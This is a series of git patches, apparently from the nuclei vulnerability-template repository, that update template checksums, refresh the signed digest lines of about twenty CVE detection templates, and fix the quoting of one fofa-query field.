http/cves/2022/CVE-2022-23898.yaml:f8c8e4e7f9865bcec5cf8dac00c5c7bab1866bf2 http/cves/2022/CVE-2022-23944.yaml:320d92bd111caf4003aeac9a1ef9f65cee4f1f5d http/cves/2022/CVE-2022-24112.yaml:4034ea358c38ea2642cfbafd6bc5f9949c0e9a74 -http/cves/2022/CVE-2022-24124.yaml:169c71fc2f22ab52ebb6b2f77600cf2aee7077a6 +http/cves/2022/CVE-2022-24124.yaml:8892e5824c33368ec1d301ce8911f00e3da4b28d http/cves/2022/CVE-2022-24129.yaml:e9b5d1244a8f2dea948ea4cfb46b3756f0292aea http/cves/2022/CVE-2022-2414.yaml:68d31eaf41572c264f08d1f4bc5041cdb6543a36 http/cves/2022/CVE-2022-24181.yaml:776437592260aa5a0b327bd750557745bb2fa704 @@ -2792,7 +2792,7 @@ http/cves/2022/CVE-2022-4117.yaml:1e44f0c7ce464548cf7a8ff5c714866891b81a12 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 http/cves/2022/CVE-2022-41412.yaml:897d78be653f3c09f28e027006285ca2dfd67d8d http/cves/2022/CVE-2022-41441.yaml:53548507ba14aae755885a74642e9df3ac4b35e7 -http/cves/2022/CVE-2022-41473.yaml:3494e5c8590cb8ef169e2973afbf8deff741d211 +http/cves/2022/CVE-2022-41473.yaml:fa99025c3ea2cad17dc2ac9f491389950e581c55 http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 http/cves/2022/CVE-2022-42094.yaml:22cbf742c665310adc7ced1dd3f87664b96b4115 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 @@ -2967,7 +2967,7 @@ http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 http/cves/2023/CVE-2023-26255.yaml:72ba0cb106a848cbf4550abb5e379601fc8d57c7 http/cves/2023/CVE-2023-26256.yaml:235515a1f0e49888d8e059097494109563de4d3f http/cves/2023/CVE-2023-26347.yaml:e2a80f4ae72176cbd3d0b523754f551888e7bbda -http/cves/2023/CVE-2023-26360.yaml:9ae6adc24876a9f0e6eba59879e0cb520015d0c1 +http/cves/2023/CVE-2023-26360.yaml:20a2d969c967e6eff664ae11ef103045267d14f2 http/cves/2023/CVE-2023-26469.yaml:fef5e0a0a6c5d3fb658813db3402193eb13a9711 http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 @@ -2997,7 +2997,7 @@ http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 -http/cves/2023/CVE-2023-28662.yaml:146d269965800ab6ea40ae0c05bb94f1bcacceb1 +http/cves/2023/CVE-2023-28662.yaml:222138e63a1f9e06b5f00d0888a71b3ab9c5cbc2 http/cves/2023/CVE-2023-28665.yaml:f7cbf06ff60743045c2b85276c87e28b0182c049 http/cves/2023/CVE-2023-29084.yaml:c13b9fdcac929cdff02edcde7bd85a1b97fd8c31 http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a @@ -3036,7 +3036,7 @@ http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 http/cves/2023/CVE-2023-32243.yaml:bcbf1f8b9ae1c03a606866feaffa2c71ba08878b -http/cves/2023/CVE-2023-32315.yaml:4678aec33f9020ea7732d346fd884688fadcb9f5 +http/cves/2023/CVE-2023-32315.yaml:e083330b0d26565dca2ede8a3c21d3eb54b253f2 http/cves/2023/CVE-2023-32563.yaml:3ac13df7389a44c872cfc4bb0916de89c6912b40 http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a http/cves/2023/CVE-2023-34259.yaml:c522d53c7b0766136d4356c8330eb60fbe2ff6a7 http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c -http/cves/2023/CVE-2023-34598.yaml:90635e327c11d10e4dfc2da81ff445a669d976fb +http/cves/2023/CVE-2023-34598.yaml:1be9a6039ef50f2c4d57ec9bcc6f72221843af61 http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289 http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 @@ -3183,7 +3183,7 @@ http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c -http/cves/2023/CVE-2023-46805.yaml:024538c13ad62db9dd0d841eaa89d386f2f0c870 +http/cves/2023/CVE-2023-46805.yaml:916b3454c9764492dc7ae8ee347edf46837e3c81 http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 http/cves/2023/CVE-2023-4714.yaml:954bbf773a17e757e0e6643ef410202037e7c8f1 http/cves/2023/CVE-2023-47211.yaml:bf40361838f0afc267bc6c62161b3f0526a2b234 @@ -3231,7 +3231,7 @@ http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9 http/cves/2023/CVE-2023-6634.yaml:d517962a1689dbbaefe2ea502e451ba9009f1dd5 http/cves/2023/CVE-2023-6831.yaml:d1a44c75188bceced79fce8fe5b7f31e1e824e4b http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 -http/cves/2023/CVE-2023-6895.yaml:9f63f7d60c0a07f24f11688a0021a925aafa4c26 +http/cves/2023/CVE-2023-6895.yaml:584cf32c7d75ecd6dd264de23662de3855103f05 http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 @@ -3259,9 +3259,9 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21887.yaml:9e4e007bba9354b143ea5c286d57142e4a967673 -http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a -http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0 +http/cves/2024/CVE-2024-21887.yaml:cb8d4d94a8080fecc469fb969cc160593ba3982e +http/cves/2024/CVE-2024-21893.yaml:64a8c554db1ed2abfcbc75e53be146faec3f10f2 +http/cves/2024/CVE-2024-22024.yaml:224f5d9d9a963ca2833b033e443665bca843216c http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1045900bb85fc3bb0daae2fa73e5aefe3e652e8f +templates-checksum.txt:c703523bfec4c8d187b64761937a051ab2d45a4f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 726914d818e892276c2313912955f7672d5f99de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:49:06 +0000 Subject: [PATCH 1285/1768] Auto Template Signing [Thu May 23 21:49:06 UTC 2024] :robot: --- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-46805.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-21893.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 732fbc9eb4..3cd87f31de 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099b0004c78261546ddee92f813ed07033007e7a8dd0ff0a86a8f24eedf199617022100a4d24a04b55d1f74aeb50551620875db7c38cba9f89652f3a5dbf50e545fae29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e232f0baa386a961ae8b970d4e146a2cc11ceb1732f26c2ef20295955e73a350022100baa328e6e710e562eb6cfa8e6f546f7d5da7d2d218cc08f888d389993d3211a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 18b2d6a8e9..4991b22251 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -50,4 +50,4 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 4a0a00473045022100bb761bd732caa4633175fb277ae6cb5413db1b1f38be0f5a60575eb0ac8fcc52022069ee62eab829a913c99b59cb9268d67426dd4012e8ebcaf33d69fe06bb0422de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c8212563123a44774116d7c5683e77960568efabe2186eddd3a932bec95f59f022100b8c1f6f528d1f59687696f621ec549e669b77b20f5a9c5fe740d557c6b53c652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index b9ad011458..6fdc4ec1a6 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -53,4 +53,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100d98c22603e30ee350d3b573d9d5ff4825287da33be904cc6363124775e5f14d2022100d0bdd8ca21310b6a688ca6b83bff7e0985fca4c661abd0703e2b8242d3bf6853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082c27b58a7f2461aff554dd5d689c6b64d365eb7a4307bb262df7556c0cfa5bd022100ccdcc3e07ad2d7fbb7a24bf16ad8d46efb371342f7048f1d74eba4b0db5eb126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index cc2e60bd10..093f38b1fd 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205122e29367165e876bee5c29e4bcbfe705ece5794ba39a0cf86f6e1cda275cbf0220086d44d6b78faed544fef3f8e6d555427fa40374b325d3de7fe815648bfd30f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e8f3ad83a505b658c3589c8e9f58b16079762f2fa09ff381e60d5674d647682022100a0333025e269f84fba3412ff25616db725b8c77ee8d7bfd724b84838bf009abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index e4516b072b..deee9aec79 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -66,4 +66,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbf59a47f71316406d2c275ffe083887a61ca90c2bb565a172cfafec81e8831d022100dd9addbecef7f4747f2d8f4e5e885ce12bf696e155604e3202698bc84fc89420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 0489b4de45..6c3a1daa56 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024b1fa47aa40900fc6d2780d4b058e73c105e0afea27957c4b13eaa9d832e518022100b564558f8322ff1be933b2018a3a2ec91219e0e1399b633b02e3d65ea0349af4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026b9eff4faf7599079f837764767028f6e5520d8f44a5be3b3dda8d7685666760221008230a47ce5142560d40267697a5445d19124ff79ed4623f4fcd9c119b4591483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 19c5820323..0be734c0ee 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e4f1ee2781a368be0c458eaaae8adb53e43b78fb18efe6e0ddbd4360db50c72022100bf77a98625b43e44488d9ed1d3bc33636a35c06b8c93ced20fe941ed6cf52a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db7f7118b80efca9c6b7a9e5122c0178b53df35cccac906cc2e4b7b6f6303030022032c0e4a5b50155baed736f13c51adad1904418dc84c461c59235f96e3efa9cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index ac86cf9c30..8eb0ec9383 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fd374bcfc7e0d1fb114e43721e82391d332bf970a505b476c6a4f46234d245002202cda416ffb5f16ec23002766e43acc4da7b06bf2294d3e7524a492b53d52fa15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a314ae51f73020c583762773eef6341d8df801ba4e0682eddf2da2a1f66b6a68022100f1898d30cc26e927ae9ebd0fda45824ae2c86fda77f438b8c2838cef00a7b8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 503b8f7ace..665b12ebb6 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202db04f9b255e97cf754ebc3deb27b4a54b33ce8bb5d8d77934815ccb21db9ca4022044559ab86eded575e036a3ddd5082711b30d9a6c7f8aa89fa03a1dc0ea16e380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d41f20bacb64537c7ebc1f93a45af8685a507b6da99f0a122c733d0656cfcb5d022100eccec5cfa1f9c7487c61db7db3b808555117ca0dea3a276f1b81ada31e9fe969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 8ee0a1a01f..30efd2cb82 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022034be4400ddd11bead7863e54de04f23d1c17f928aef2720f6a7c9b4d234581b2022001f7f119d81ac51ef899efc1106ad966682323a96b57947df36030ff8300e7d5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d231078095447bd320631039dee869d6cbb6aa41162ce4d20df62ebb5f1fcf600221009d1396e605fd7dc03ef58d5bc874856dd17cbcc41ed9047bf399b019c4c91c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index bf89028ef1..0a37dac7d6 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba5ebd65a068d08aa8a9fb4c512f59baa665b2cbe8fa4e25a66a92104f27f415022100d66fba2ed1e2304f9c437470604cb22840501aada5cd30a98bf5d9811b2b07e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220614ef078d691a5f14e80b47261e56ea1b93ef02cb8d3b9b3565c4e7114436bfb022076abe69243fb8935036a268de3bda1f2fa58c493fd3a35e8b2a62e9ec39db06f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index cbf14d6f72..b6f89d0eb7 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -55,4 +55,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100c58fceffebfff86b06bc748f4759ee099fb80f00e432c905c92ff3b6c436038302202c36e9465160abafb7e170e40b57a606e55425682a44759c74541c12bb7de277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205698995c249ffd4a99ec1e5e70748e5ff9b6672660456da63e2278057f774024022100cc2e426ca1958716eefc00654a4ef74b95883bc11134b574c4d717b24441305f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 53bdc464b9..f4c634ca3c 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -59,4 +59,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 490a004630440220701c3e510171597b0328578de16d4891aa76d61b63459dc89839d25b3c9b65fc022003b91c82fa884ae8a5139739fddafa97aa75fcade9da5da3c7781d8ab95d07d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021b0065afd452b596019be1f29280c7188acefb68b151f4424790005959092ce0220570d61411787677f1f9159c72796d6bda6e7f3213de0c8314053f75bea9749bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 73b4aef3a0..26a48d8fe1 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5147f2bcdbc971c4379421b14ab15063e084d6306980cdb019ce3ed33fed2f1022100d73fa5942f5f3dd8d26a3c3438a85f0ddfbe1153c06e0136275336131a1788e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202de73ede6c782fa2e7558f120af51ccdb43e6a834f0cb11b796ac10f14abf745022068858456f26584ae6b4d402af1069998db1db3a842d77a00531bafc642d74867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index caf93a901a..72cedccfb6 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9067e909acc7a2d500f2c26948b4522fdc9edd4b54f73569d62173980ae5508022040a90e51a04e9bc63fdc75a8a8a3dafc7d45accc85ebcdde5cae853e953cdab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eaebd01f85c85ab0ac1c84e6687bddb67703b7b394beddfc320b8a31e9c6cd8d022100d361cee4f4db9cd03330b2674ac1fdba912a93c4ea328fdca0d56ded1ca1dd72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 4fb876ef38..996e6d04f4 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "block_message")' - 'contains(header_2, "application/json")' condition: and -# digest: 490a0046304402200ecd050c196cc17a960bbe78b7217a1d0bbdf94d05261a528f992427117b470002206a36cafa1a82caa7f5dcaf43f9abaa55438c280dbdb67df57eaab83abc12ebc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d20c5dc0052826ea14f0dff2969048d96672f04b90e75cb43a55f82c0cdf9b9902203f2a6f982a2068da15545263b3a76ce341cbca2cd7c16dc3d0a16e8f9bd283bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 757d797758..034e26941e 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e5f6f58822279125780718555791f922c2ad0666d25b6f4968041dffbdaceca0220237fc1deabec0aa7764f6ff4be202849488aa19da84dcdcfb287fc8e8a7f7543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5522ab583b393cf6a360b2e58dae29b4681cb2fefa1f6ad38518b6dc74c829c022013094391177663822a780dcd082911844f772129caea17c943068a4037e24e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 0c542dddb3..700c4f220d 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -50,4 +50,4 @@ http: - '"result":' - '"message":' condition: and -# digest: 4b0a00483046022100dfcc3f9560479437b285218b46fa79b25d6dce508f57d8d245a7722be24d64f20221009d4ce1c5c3203ebbe9527f74aaa75ad7a4d72d26f812ed7ac78a4fd9451829ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b11fb4caa72e93adcd3d6b4881baab60260caf734506dbeee298619d8a45db302205572b212a5aed50300f75693d3e4a74f34ee40ed420c6a4f2f83ded92f8699b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 381a5e5c93..0727b749b5 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -48,4 +48,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 490a0046304402200a0547b87f667aa36af039f186372735c368c54758d1da68f5b0fd18312a8c0402201944364cc59a7b39458b86b84369d97aa826d793c83d4c42fed8f694a87920be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a797d4c0fc87aff6583e71171c6d273e3f085bb60230c59a4a66e25d192d82d5022100a7a07c9ff12e69f386f9e2c80c1c134ea79bb8969038a584f32354d05de18618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 572a2940d4..2dd07ad283 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -46,4 +46,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4a0a00473045022100b30b610e83925ba39d984d8e235e97014a180a7e945b4a35faec7386faa1b79b022026685bd4cdedbb97d9918ebdd5f362731b82b6368331fc30b6dcbfef0acaccdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9957e443991b0960713b78c4fe96492cf6b6d9c5d70a45a77c8946752f125d1022100aba7f397b618737db6ab5865122dac0d1eab63346e36dc40656a995e97cbb619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3aa98d7f3b418f2f6f4db66847e7794a6113f2c0 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:22:39 +0530 Subject: [PATCH 1286/1768] Update CVE-2024-1061.yaml --- http/cves/2024/CVE-2024-1061.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index aa0d05ef41..413103a138 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -30,7 +30,7 @@ info: vendor: bplugins product: html5_video_player framework: wordpress - fofa-query: "wordpress" && body="html5-video-player" + fofa-query: "\"wordpress\" && body=\"html5-video-player\"" tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player http: From dbf496de630cc80e137903b37c7383b9d2256ff3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:56:25 +0000 Subject: [PATCH 1288/1768] Auto Generated Templates Checksum [Thu May 23 21:56:25 UTC 2024] :robot: --- templates-checksum.txt | 44 +++++++++++++++++++++--------------------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 85abfd4a45..9189aa4173 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1372,7 +1372,7 @@ http/cves/2017/CVE-2017-9805.yaml:4fe5223d9747e0cd6872564b8069d1d2074a8fdc http/cves/2017/CVE-2017-9822.yaml:137875cd55de914baf6ad6cca7783b728484715c http/cves/2017/CVE-2017-9833.yaml:c08b62014c13f6adbdf1b39fb6199d35f4df773c http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:0164997996d5bfeabd4811bb3b48e4d1429e4621 +http/cves/2018/CVE-2018-0127.yaml:b01f3b431d398441068d16cea655f42cd95a76dd http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c http/cves/2018/CVE-2018-1000129.yaml:03328d29e7ad3ec82f00b8de687d940ec9060db9 http/cves/2018/CVE-2018-1000130.yaml:c82881e9663b78ba5b44251f15b4e93555896100 @@ -1448,14 +1448,14 @@ http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a 